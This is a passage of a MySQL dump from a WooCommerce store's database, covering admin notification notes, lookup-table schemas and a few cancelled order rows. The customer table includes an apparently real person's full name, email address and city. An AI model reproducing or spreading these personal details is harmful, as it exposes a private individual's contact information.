(53,'woocommerce-core-sqli-july-2021-store-patched','update','en_US','Solved: Critical vulnerabilities patched in WooCommerce','In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br /><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.','{}','pending','woocommerce.com','2021-07-16 11:17:41',NULL,0,'plain','',0,'info',0),
(54,'woocommerce-blocks-sqli-july-2021-store-patched','update','en_US','Solved: Critical vulnerabilities patched in WooCommerce Blocks','In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br /><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.','{}','pending','woocommerce.com','2021-07-16 11:17:41',NULL,0,'plain','',0,'info',0),
(55,'stripe_applepay_holiday2021','marketing','en_US','Boost sales this holiday season with Apple Pay!','Increase your conversion rate by letting your customers know that you accept Apple Pay. It’s seamless to <a href=\"https://docs.woocommerce.com/document/stripe/?_ga=2.90941597.642705274.1635776464-1391993999.1621950839#apple-pay\">enable Apple Pay with Stripe</a> and easy to communicate it with this <a href=\"https://developer.apple.com/apple-pay/marketing/\">marketing guide</a>.','{}','pending','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(56,'square_applepay_holiday2021','marketing','en_US','Boost sales this holiday season with Apple Pay!','Increase your conversion rate by letting your customers know that you accept Apple Pay. It’s seamless to <a href=\"https://docs.woocommerce.com/document/woocommerce-square/?_ga=2.90941597.642705274.1635776464-1391993999.1621950839#section-14\">enable Apple Pay with Square</a> and easy to communicate it with this <a href=\"https://developer.apple.com/apple-pay/marketing/\">marketing guide</a>.','{}','pending','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(57,'wcpay_applepay_holiday2021','marketing','en_US','Boost sales this holiday season with Apple Pay!','Increase your conversion rate by letting your customers know that you accept Apple Pay. It’s seamless to <a href=\"https://docs.woocommerce.com/document/payments/apple-pay/\">enable Apple Pay with WooCommerce Payments</a> and easy to communicate it with this <a href=\"https://developer.apple.com/apple-pay/marketing/\">marketing guide</a>.','{}','pending','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(58,'new_in_app_marketplace_2021','info','en_US','Customize your store with extensions','Check out our NEW Extensions tab to see our favorite extensions for customizing your store, and discover the most popular extensions in the WooCommerce Marketplace.','{}','unactioned','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(59,'wayflyer_bnpl_q4_2021','marketing','en_US','Grow your business with funding through Wayflyer','Fast, flexible financing to boost cash flow and help your business grow – one fee, no interest rates, penalties, equity, or personal guarantees. Based on your store’s performance, Wayflyer provides funding and analytical insights to invest in your business.','{}','pending','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(60,'wc_shipping_mobile_app_usps_q4_2021','marketing','en_US','Print and manage your shipping labels with WooCommerce Shipping and the WooCommerce Mobile App','Save time by printing, purchasing, refunding, and tracking shipping labels generated by <a href=\"https://woocommerce.com/woocommerce-shipping/\">WooCommerce Shipping</a> – all directly from your mobile device!','{}','pending','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(61,'wc_shipping_mobile_app_q4_2021','marketing','en_US','Print and manage your shipping labels with the WooCommerce Mobile App','Save time by printing, purchasing, refunding, and tracking shipping labels generated by <a href=\"https://woocommerce.com/woocommerce-shipping/\">WooCommerce Shipping</a> – all directly from your mobile device!','{}','pending','woocommerce.com','2022-02-18 18:21:59',NULL,0,'plain','',0,'info',0),
(62,'habit-moment-survey','marketing','en_US','We’re all ears! Share your experience so far with WooCommerce','We’d love your input to shape the future of WooCommerce together. Feel free to share any feedback, ideas or suggestions that you have.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(63,'ecomm-wc-navigation-survey','info','en_US','We’d like your feedback on the WooCommerce navigation','We’re making improvements to the WooCommerce navigation and would love your feedback. Share your experience in this 2 minute survey.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(64,'wc_simple_payments_m2_reader_launch_q1_2022','marketing','en_US','Take quick and easy in-person payments','WooCommerce is continuing to power up your business with our new Simple Payments feature, built exclusively for WooCommerce In-Person Payments. Capture quick and simple payments anywhere else your customers are – or offer a local pickup option with payment taken in-person for orders placed online.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(65,'wcpay_applepay_q1_2022','marketing','en_US','Increase conversions with Apple Pay – just like Diane does','See how Diane from <a href=\"https://woocommerce.com/posts/lady-dye-yarns-from-crafts-to-activism-with-woocommerce/?utm_source=product&utm_medium=inboxnotification&utm_campaign=apple-pay\" target=\"_blank\">Lady Dye Yarns</a> uses Apple Pay to provide customers with the fast, secure checkout experience they love. You can, too – Apple Pay is included in WooCommerce Payments. Here\'s how you can increase conversions by encouraging shoppers to pay with a single tap.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(66,'stripe_applepay_q1_2022','marketing','en_US','Increase conversions with Apple Pay – just like Thomas does','Read the inspirational story of <a href=\"https://woocommerce.com/posts/incredible-story-of-thomas-trendy-socks-down-syndrome-entrepreneur/?utm_source=product&utm_medium=inboxnotification&utm_campaign=apple-pay\" target=\"_blank\">Thomas\'s Trendy Socks</a> and see how he’s using Apple Pay to provide customers with the fast, secure checkout experience they love. You can, too – ready to turn more visitors into buyers? Accept Apple Pay by selecting Enable express checkouts in Settings > Payments > Stripe.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(67,'square_applepay_q1_2022','marketing','en_US','Increase conversions with a faster checkout experience','By enabling Apple Pay in Square, your customers can complete purchases quickly and securely with a single touch or a glance – no lengthy checkout forms necessary. Accept Apple Pay by enabling Digital Wallets within Settings > Payments > Square.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(68,'lead_gen_existing_customers_1','marketing','en_US','Talk to a consultant','As your business grows, you want to optimize costs, streamline operations, and sell more. We can help. Talk to us about how you can get the most out of WooCommerce.','{}','pending','woocommerce.com','2022-02-18 18:22:00',NULL,0,'plain','',0,'info',0),
(69,'wc-refund-returns-page','info','en_US','Setup a Refund and Returns Policy page to boost your store\'s credibility.','We have created a sample draft Refund and Returns Policy page for you. Please have a look and update it to fit your store.','{}','unactioned','woocommerce-core','2022-02-18 18:29:54',NULL,0,'plain','',0,'info',0),
(70,'wc-admin-launch-checklist','info','en_US','Ready to launch your store?','To make sure you never get that sinking \"what did I forget\" feeling, we\'ve put together the essential pre-launch checklist.','{}','unactioned','woocommerce-admin','2022-02-19 11:15:03',NULL,0,'plain','',0,'info',0),
(71,'wc-admin-edit-products-on-the-move','info','en_US','Edit products on the move','Edit and create new products from your mobile devices with the Woo app','{}','unactioned','woocommerce-admin','2022-02-19 11:15:04',NULL,0,'plain','',0,'info',0),
(72,'wc-admin-performance-on-mobile','info','en_US','Track your store performance on mobile','Monitor your sales and high performing products with the Woo app.','{}','unactioned','woocommerce-admin','2022-02-19 11:15:04',NULL,0,'plain','',0,'info',0),
(73,'wc-admin-update-store-details','info','en_US','Edit your store details if you need to','Nice work completing your store profile! You can always go back and edit the details you just shared, as needed.','{}','unactioned','woocommerce-admin','2022-02-19 11:15:04',NULL,0,'plain','',0,'info',0),
(74,'wc-admin-new-sales-record','info','en_US','New sales record!','Woohoo, February 19th was your record day for sales! Net sales was ﷼4,000.00 beating the previous record of ﷼3,000.00 set on December 28th.','{\"old_record_date\":\"2020-12-28\",\"old_record_amt\":3000,\"new_record_date\":\"2022-02-19\",\"new_record_amt\":4000}','unactioned','woocommerce-admin','2022-02-20 11:40:44',NULL,0,'plain','',0,'info',0),
(75,'woocommerce-core-paypal-march-2022-updated','update','en_US','Security auto-update of WooCommerce','<strong>Your store has been updated to the latest secure version of WooCommerce</strong>. We worked with WordPress to deploy PayPal Standard security updates for stores running WooCommerce (version 3.5 to 6.3). It’s recommended to disable PayPal Standard, and use <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal Payments</a> to accept PayPal.','{}','pending','woocommerce.com','2022-03-11 11:18:53',NULL,0,'plain','',0,'info',0),
(76,'woocommerce-core-paypal-march-2022-updated-nopp','update','en_US','Security auto-update of WooCommerce','<strong>Your store has been updated to the latest secure version of WooCommerce</strong>. We worked with WordPress to deploy security updates related to PayPal Standard payment gateway for stores running WooCommerce (version 3.5 to 6.3).','{}','unactioned','woocommerce.com','2022-03-11 11:18:53',NULL,0,'plain','',0,'info',0),
(77,'pinterest_03_2022_update','marketing','en_US','Your Pinterest for WooCommerce plugin is out of date!','Update to the latest version of Pinterest for WooCommerce to continue using this plugin and keep your store connected with Pinterest. To update, visit <strong>Plugins > Installed Plugins</strong>, and click on “update now” under Pinterest for WooCommerce.','{}','pending','woocommerce.com','2022-03-24 13:11:34',NULL,0,'plain','',0,'info',0),
(78,'wc-admin-navigation-nudge','info','en_US','You now have access to the WooCommerce navigation','We’re introducing a new navigation for a more intuitive and improved user experience. You can enable the beta version of the new experience in the Advanced Settings. Enable it now for your store.','{}','unactioned','woocommerce-admin','2022-04-14 11:18:44',NULL,0,'plain','',0,'info',0),
(79,'pinterest_gtm_q2_2021','marketing','en_US','Get your products in front of a large, engaged audience','Did you know that shoppers on Pinterest spend twice as much as people on other social platforms? With the new, official Pinterest for WooCommerce, you can turn your product catalog into shoppable Pins and showcase them to 400+ million monthly users looking to buy.','{}','unactioned','woocommerce.com','2022-04-24 11:16:30',NULL,0,'plain','',0,'info',0),
(80,'setup_task_initiative_survey_q2_2022','survey','en_US','We want to know what matters most to you','Take 2 minutes to give us your input on what is important for you while setting up your store and help shape the future of WooCommerce together.','{}','pending','woocommerce.com','2022-04-26 11:17:57',NULL,0,'plain','',0,'info',0),
(81,'woocommerce_payments_subscriptions_nopayments_q2_2022','marketing','en_US','Sell subscriptions online – without a paid extension','Say hello to WooCommerce Payments – now with built-in subscriptions functionality. Get free access to the features you need to start earning recurring revenue online. Pay as you go, with no setup costs or monthly fees.','{}','pending','woocommerce.com','2022-04-27 11:38:16',NULL,0,'plain','',0,'info',0),
(82,'woocommerce_payments_subscriptions_yespayments_q2_2022','marketing','en_US','Sell subscriptions online – no extra extension required','It\'s here! WooCommerce Payments now features built-in subscriptions functionality. No need to install an extra, paid extension – we\'ve made it simpler than ever to start earning recurring revenue. Ready to grow your business?','{}','pending','woocommerce.com','2022-04-27 11:38:16',NULL,0,'plain','',0,'info',0),
(83,'setup_task_second_survey_q2_2022','survey','en_US','We want to know what matters most to you','Take 2 minutes to give us your input on what is important for you while setting up your store and help shape the future of WooCommerce together.','{}','pending','woocommerce.com','2022-05-10 11:15:48',NULL,0,'plain','',0,'info',0),
(84,'store_setup_survey_survey_q2_2022','survey','en_US','How is your store setup going?','Our goal is to make sure you have all the right tools to start setting up your store in the smoothest way possible.\r\nWe’d love to know if we hit our mark and how we can improve. To collect your thoughts, we made a 2-minute survey.','{}','pending','woocommerce.com','2022-05-10 11:15:48',NULL,0,'plain','',0,'info',0),
(85,'wc-admin-EU-consumer-protection','marketing','en_US','Important changes to EU consumer protection laws','New regulations to help modernize and strengthen consumer protection laws in the European Union (EU) take effect on May 28, 2022. These rules impact all merchants selling to the EU, regardless of where their business is located. Further detailed information is available on the European Commission\'s official website.','{}','unactioned','woocommerce.com','2022-05-15 11:37:50',NULL,0,'plain','',0,'info',0),
(86,'affirm_q2_2022','marketing','en_US','Boost your business with flexible payments','Expand your customer base with smarter payment options for more shoppers. With Affirm, you can offer the most relevant payment options at every price point – from four interest-free payments every two weeks to longer installments up to 36 months. Fast-track your revenue goals today!','{}','pending','woocommerce.com','2022-05-15 11:37:50',NULL,0,'plain','',0,'info',0),
(87,'googlelistings_multicountrygtm_q22022','marketing','en_US','Expand your audience with Multi-Country Advertising','It\'s time to expand your audience with Multi-Country Advertising, an exciting new feature in Google Listings & Ads. Reach more potential customers in as many regions as you like within a single campaign, all from the convenience of your WooCommerce dashboard.','{}','unactioned','woocommerce.com','2022-05-16 11:29:52',NULL,0,'plain','',0,'info',0),
(88,'wc_ipp_order_creation_GTM_launch_q2_2022','marketing','en_US','Grow your business on the go with WooCommerce In-Person Payments','Quickly create new orders, manage transactions, and take secure payments no matter where your business takes you. With automatic inventory sync, WooCommerce In-Person Payments is the only fully integrated solution for taking your WooCommerce store offline.','{}','pending','woocommerce.com','2022-05-26 11:19:36',NULL,0,'plain','',0,'info',0),
(89,'wc-admin-wisepad3','marketing','en_US','Take your business on the go in Canada with WooCommerce In-Person Payments','Quickly create new orders, accept payment in person for orders placed online, and automatically sync your inventory – no matter where your business takes you. With WooCommerce In-Person Payments and the WisePad 3 card reader, you can bring the power of your store anywhere.','{}','pending','woocommerce.com','2022-06-15 11:21:44',NULL,0,'plain','',0,'info',0),
(90,'TikTok q2_2022','marketing','en_US','Give your store a stage on the world’s fastest-growing advertising channel','With TikTok for WooCommerce, you can sync your catalog, create videos, and track performance in front of TikTok’s one billion global users. Try the Smart Video Generator to make ads using your existing product images – no camera needed. Get $200 in ad credit from TikTok after a $20 spend (terms & conditions apply).','{}','unactioned','woocommerce.com','2022-06-22 11:23:46',NULL,0,'plain','',0,'info',0),
(91,'tiktok-webinar-promo-july2022','marketing','en_US','Free webinar: TikTok for WooCommerce','Join WooCommerce and TikTok live on July 14 to learn about ad types, trends, and the best ways to connect with an audience of one billion active users on the world’s fastest-growing social platform. Participants have a chance to score a free month of Vimeo Pro, and two winners will get a $5,000 ad credit and more.','{}','pending','woocommerce.com','2022-07-09 11:35:31',NULL,0,'plain','',0,'info',0),
(92,'mercado_pago_q3_2022','marketing','en_US','Get paid with Mercado Pago Checkout','Give your customers a checkout they can trust with Latin America\'s leading payment processor. Securely accept debit and credit cards, cash, bank transfers, and installment payments – backed by exclusive fraud prevention tools.','{}','pending','woocommerce.com','2022-08-08 11:18:43',NULL,0,'plain','',0,'info',0),
(93,'klarna_q3_2022','marketing','en_US','Meet Klarna – your ultimate growth partner','Increase conversions by offering secure, flexible payment solutions – including buy now, pay later – all through a one-click checkout experience. Plus, you’ll tap into a whole new market of the world’s most engaged shoppers.','{}','pending','woocommerce.com','2022-08-08 11:18:43',NULL,0,'plain','',0,'info',0),
(94,'woocommerce-payments-august-2022-need-to-update','update','en_US','Action required: Please update WooCommerce Payments','An updated secure version of WooCommerce Payments is available – please ensure that you’re using the latest patch version. For more information on what action you need to take, please review the article below.','{}','pending','woocommerce.com','2022-08-10 11:40:41',NULL,0,'plain','',0,'info',0),
(95,'woocommerce-payments-august-2022-store-patched','update','en_US','WooCommerce Payments has been automatically updated','You’re now running the latest secure version of WooCommerce Payments. We’ve worked with the WordPress Plugins team to deploy a security update to stores running WooCommerce Payments (version 3.9 to 4.5). For further information, please review the article below.','{}','pending','woocommerce.com','2022-08-10 11:40:41',NULL,0,'plain','',0,'info',0),
(96,'mobile_app_order_management_q3_2022','marketing','en_US','Take order management on the go','The WooCommerce Mobile App continues to get better with added order management functionality! Add or remove products, edit fees, or change the shipping options in any existing order – all from within the app.','{}','unactioned','woocommerce.com','2022-08-17 11:27:39',NULL,0,'plain','',0,'info',0),
(97,'product_creation_usability_test_3_months','survey','en_US','Have a say in the future of WooCommerce','Take an early look at the future of editing products in WooCommerce. Share your thoughts (~5 minutes) and help shape the experience for yourself and other merchants.','{}','pending','woocommerce.com','2022-08-25 11:14:40',NULL,0,'plain','',0,'info',0),
(98,'product_creation_usability_test_6_months','survey','en_US','Try the new product edit form prototype','Take an early look at the future of editing products in WooCommerce. Share your thoughts (~5 minutes) and help shape the experience for yourself and other merchants.','{}','pending','woocommerce.com','2022-08-30 11:30:00',NULL,0,'plain','',0,'info',0),
(99,'product_creation_usability_test_12_months','survey','en_US','Try the new product edit form prototype','Take an early look at the future of editing products in WooCommerce. Share your thoughts (~5 minutes) and help shape the experience for yourself and other merchants.','{}','pending','woocommerce.com','2022-09-07 12:26:05',NULL,0,'plain','',0,'info',0),
(100,'custom_deposit_schedules_inbox','marketing','en_US','Customize your deposit schedule','Receive your funds according to your own business needs with custom deposit schedules from WooCommerce Payments. You’ll have the flexibility to deposit funds into your bank account daily, weekly, monthly, or even on-demand – you’ve done the work, now get paid on your terms.','{}','pending','woocommerce.com','2022-09-15 11:14:06',NULL,0,'plain','',0,'info',0),
(101,'googlelistings_signals2022_hasGLA','marketing','en_US','Show off your products with Ads on Google','You’re ready to grow with ads. Google optimizes for performance across your products; you only pay for results. If you’re new to Google, you can earn up to $500 in ad credits (T&Cs apply). <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">Contact support</a> if you need guidance with Google Listings & Ads.','{}','pending','woocommerce.com','2022-09-23 11:23:30',NULL,0,'plain','',0,'info',0),
(102,'googlelistings_signals2022_noGLA','marketing','en_US','Show off your products with Ads on Google','You’re ready to grow with ads. Google optimizes for performance across your products; you only pay for results. If you’re new to Google, you can earn up to $500 in ad credits (T&Cs apply). <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">Contact support</a> if you need guidance with Google Listings & Ads.','{}','pending','woocommerce.com','2022-09-23 11:23:30',NULL,0,'plain','',0,'info',0),
(103,'pre-black-friday-sale-2022-announcement','marketing','en_US','Surprise! We’re offering 40% off everything at WooCommerce.com','Just in time to get your store Black Friday ready. Sale ends 7 October, 2pm UTC.','{}','unactioned','woocommerce.com','2022-10-04 11:32:50',NULL,0,'plain','',0,'info',0),
(104,'shipping_category_q4_2022','marketing','en_US','Save time on shipping','Is your store all set to ship? Save valuable time (and money!) by automating your fulfillment process for the busiest shopping season. Explore our range of trusted shipping partners to get started.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0),
(105,'woocommerce_admin_deprecation_q4_2022','info','en_US','WooCommerce Admin is part of WooCommerce!','To make sure your store continues to run smoothly, check that WooCommerce is up-to-date – at least version 6.5 – and then disable the WooCommerce Admin plugin.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0),
(106,'tiktok-targeted-q4-2022','marketing','en_US','Get $200 in ad credit from TikTok after you spend $20 on your first campaign','Reach one billion shoppers with TikTok for WooCommerce this holiday season! Sync your product catalog, capture insights, and create ad campaigns right from your dashboard. Connect your store today to unlock this limited time offer! <a href=\"https://ads.tiktok.com/help/article?aid=10011326\">Terms & conditions apply</a>.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0),
(107,'paypal_paylater_g3_q4_22','marketing','en_US','Turn browsers into buyers with Pay Later','Add PayPal at checkout, plus give customers a buy now, pay later option from the name they trust. With Pay in 4 & Pay Monthly, available in PayPal Payments, you get paid up front while letting customers spread their payments over time. Boost your average order value and convert more sales – at no extra cost to you.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0),
(108,'paypal_paylater_g2_q4_22','marketing','en_US','Upgrade to PayPal Payments to offer Pay Later at checkout','PayPal Pay Later is included in PayPal Payments at no additional cost to you. Customers can spread their payments over time while you get paid up front. \r\nThere’s never been a better time to upgrade your PayPal plugin. Simply download it and connect with a PayPal Business account.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0),
(109,'google_listings_ads_custom_attribute_mapping_q4_2022','marketing','en_US','Our latest improvement to the Google Listings & Ads extension: Attribute Mapping','You spoke, we listened. This new feature enables you to easily upload your products, customize your product attributes in one place, and target shoppers with more relevant ads. Extend how far your ad dollars go with each campaign.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0),
(110,'wc-admin-manualauthcapture','marketing','en_US','Miss fewer manual payments in WooCommerce Payments','Using WooCommerce Payments to manually authorize and capture payments? We’ve introduced a simplified and more efficient process, so you can miss fewer payments and continue to grow your revenue.','{}','pending','woocommerce.com','2022-12-03 07:41:05',NULL,0,'plain','',0,'info',0);
/*!40000 ALTER TABLE `wp_wc_admin_notes` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_category_lookup`
--
DROP TABLE IF EXISTS `wp_wc_category_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_category_lookup` (
`category_tree_id` bigint(20) unsigned NOT NULL,
`category_id` bigint(20) unsigned NOT NULL,
PRIMARY KEY (`category_tree_id`,`category_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_category_lookup`
--
LOCK TABLES `wp_wc_category_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_category_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_category_lookup` VALUES
(154,154);
/*!40000 ALTER TABLE `wp_wc_category_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_customer_lookup`
--
DROP TABLE IF EXISTS `wp_wc_customer_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_customer_lookup` (
`customer_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned DEFAULT NULL,
`username` varchar(60) NOT NULL DEFAULT '',
`first_name` varchar(255) NOT NULL,
`last_name` varchar(255) NOT NULL,
`email` varchar(100) DEFAULT NULL,
`date_last_active` timestamp NULL DEFAULT NULL,
`date_registered` timestamp NULL DEFAULT NULL,
`country` char(2) NOT NULL DEFAULT '',
`postcode` varchar(20) NOT NULL DEFAULT '',
`city` varchar(100) NOT NULL DEFAULT '',
`state` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`customer_id`),
UNIQUE KEY `user_id` (`user_id`),
KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_customer_lookup`
--
LOCK TABLES `wp_wc_customer_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_customer_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_customer_lookup` VALUES
(1,2,'masoud','Masoud','Nikoofar','masoud.nikoofar@gmail.com','2022-04-12 19:30:00','2020-02-02 04:37:58','IR','123','تهران','THR');
/*!40000 ALTER TABLE `wp_wc_customer_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_download_log`
--
DROP TABLE IF EXISTS `wp_wc_download_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_download_log` (
`download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`timestamp` datetime NOT NULL,
`permission_id` bigint(20) unsigned NOT NULL,
`user_id` bigint(20) unsigned DEFAULT NULL,
`user_ip_address` varchar(100) DEFAULT '',
PRIMARY KEY (`download_log_id`),
KEY `permission_id` (`permission_id`),
KEY `timestamp` (`timestamp`),
CONSTRAINT `fk_wp_wc_download_log_permission_id` FOREIGN KEY (`permission_id`) REFERENCES `wp_woocommerce_downloadable_product_permissions` (`permission_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_download_log`
--
LOCK TABLES `wp_wc_download_log` WRITE;
/*!40000 ALTER TABLE `wp_wc_download_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_download_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_order_coupon_lookup`
--
DROP TABLE IF EXISTS `wp_wc_order_coupon_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_coupon_lookup` (
`order_id` bigint(20) unsigned NOT NULL,
`coupon_id` bigint(20) NOT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`discount_amount` double NOT NULL DEFAULT 0,
PRIMARY KEY (`order_id`,`coupon_id`),
KEY `coupon_id` (`coupon_id`),
KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_order_coupon_lookup`
--
LOCK TABLES `wp_wc_order_coupon_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_coupon_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_coupon_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_order_product_lookup`
--
DROP TABLE IF EXISTS `wp_wc_order_product_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_product_lookup` (
`order_item_id` bigint(20) unsigned NOT NULL,
`order_id` bigint(20) unsigned NOT NULL,
`product_id` bigint(20) unsigned NOT NULL,
`variation_id` bigint(20) unsigned NOT NULL,
`customer_id` bigint(20) unsigned DEFAULT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`product_qty` int(11) NOT NULL,
`product_net_revenue` double NOT NULL DEFAULT 0,
`product_gross_revenue` double NOT NULL DEFAULT 0,
`coupon_amount` double NOT NULL DEFAULT 0,
`tax_amount` double NOT NULL DEFAULT 0,
`shipping_amount` double NOT NULL DEFAULT 0,
`shipping_tax_amount` double NOT NULL DEFAULT 0,
PRIMARY KEY (`order_item_id`),
KEY `order_id` (`order_id`),
KEY `product_id` (`product_id`),
KEY `customer_id` (`customer_id`),
KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_order_product_lookup`
--
LOCK TABLES `wp_wc_order_product_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_product_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_order_product_lookup` VALUES
(1,325,323,0,1,'2020-12-27 06:43:33',2,2000,2000,0,0,0,0),
(2,326,323,0,1,'2020-12-28 06:45:00',3,3000,3000,0,0,0,0),
(3,607,323,0,1,'2022-02-19 05:26:56',4,4000,4000,0,0,0,0);
/*!40000 ALTER TABLE `wp_wc_order_product_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_order_stats`
--
DROP TABLE IF EXISTS `wp_wc_order_stats`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_stats` (
`order_id` bigint(20) unsigned NOT NULL,
`parent_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`num_items_sold` int(11) NOT NULL DEFAULT 0,
`total_sales` double NOT NULL DEFAULT 0,
`tax_total` double NOT NULL DEFAULT 0,
`shipping_total` double NOT NULL DEFAULT 0,
`net_total` double NOT NULL DEFAULT 0,
`returning_customer` tinyint(1) DEFAULT NULL,
`status` varchar(200) NOT NULL,
`customer_id` bigint(20) unsigned NOT NULL,
PRIMARY KEY (`order_id`),
KEY `date_created` (`date_created`),
KEY `customer_id` (`customer_id`),
KEY `status` (`status`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_order_stats`
--
LOCK TABLES `wp_wc_order_stats` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_stats` DISABLE KEYS */;
INSERT INTO `wp_wc_order_stats` VALUES
(325,0,'2020-12-27 06:43:33','2020-12-27 06:43:33',2,2000,0,0,2000,0,'wc-cancelled',1),
(326,0,'2020-12-28 06:45:00','2020-12-28 06:45:00',3,3000,0,0,3000,0,'wc-cancelled',1),
(607,0,'2022-02-19 05:26:56','2022-02-19 05:26:56',4,4000,0,0,4000,0,'wc-cancelled',1);
/*!40000 ALTER TABLE `wp_wc_order_stats` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_order_tax_lookup`
--
DROP TABLE IF EXISTS `wp_wc_order_tax_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_tax_lookup` (
`order_id` bigint(20) unsigned NOT NULL,
`tax_rate_id` bigint(20) unsigned NOT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`shipping_tax` double NOT NULL DEFAULT 0,
`order_tax` double NOT NULL DEFAULT 0,
`total_tax` double NOT NULL DEFAULT 0,
PRIMARY KEY (`order_id`,`tax_rate_id`),
KEY `tax_rate_id` (`tax_rate_id`),
KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_order_tax_lookup`
